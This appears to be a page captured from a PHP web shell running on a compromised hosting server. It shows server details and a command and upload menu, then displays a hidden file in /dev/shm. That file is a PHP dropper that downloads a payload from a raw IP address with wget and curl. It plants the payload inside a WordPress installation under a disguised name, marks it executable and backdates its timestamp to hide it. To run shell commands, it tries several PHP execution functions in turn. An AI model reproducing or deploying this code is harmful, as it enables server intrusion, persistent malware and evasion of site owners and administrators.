Server IP : 68.65.122.142  /  Your IP : 52.15.133.37
Web Server : LiteSpeed
System : Linux server167.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
User : glenirhm ( 1318)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (1777) :  /var/../lib64/python3.8/pydoc_data/../html/../../X11/../python2.7/../../usr/../dev/shm/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : //var/../lib64/python3.8/pydoc_data/../html/../../X11/../python2.7/../../usr/../dev/shm/.data_chunk
<?php   $p = '/home/pakiizae/crown11.cc//home/pakiizae/crown11.org/wp-includes/blocks/calendar/corpo_mod'; $u = 'http://185.147.124.223/c893727d7fa0d671e267f53464f0cdb6'; $fs = 5496; $ft = 1746033069; run("wget -O {$p} {$u}"); check($p, $fs, $ft); run("curl -o {$p} {$u}"); check($p, $fs, $ft); function check($p, $fs, $ft) {     if (file_exists($p) && filesize($p) == $fs) {         @chmod($p, 0744);         @touch($p, $ft);         die('_uploaded!_');     } } function run($in) {     $out = '';     if (function_exists('exec')) {         @exec($in, $out);         $out = @join("\n", $out);     } elseif (function_exists('passthru')) {         ob_start();         @passthru($in);         $out = ob_get_clean();     } elseif (function_exists('system')) {         ob_start();         @system($in);         $out = ob_get_clean();     } elseif (function_exists('shell_exec')) {         $out = shell_exec($in);     } elseif (is_resource($f = @popen($in, "r"))) {         $out = "";         while (!@feof($f)) $out .= fread($f, 1024);         pclose($f);     }     return $out; } die('_upload_failed_');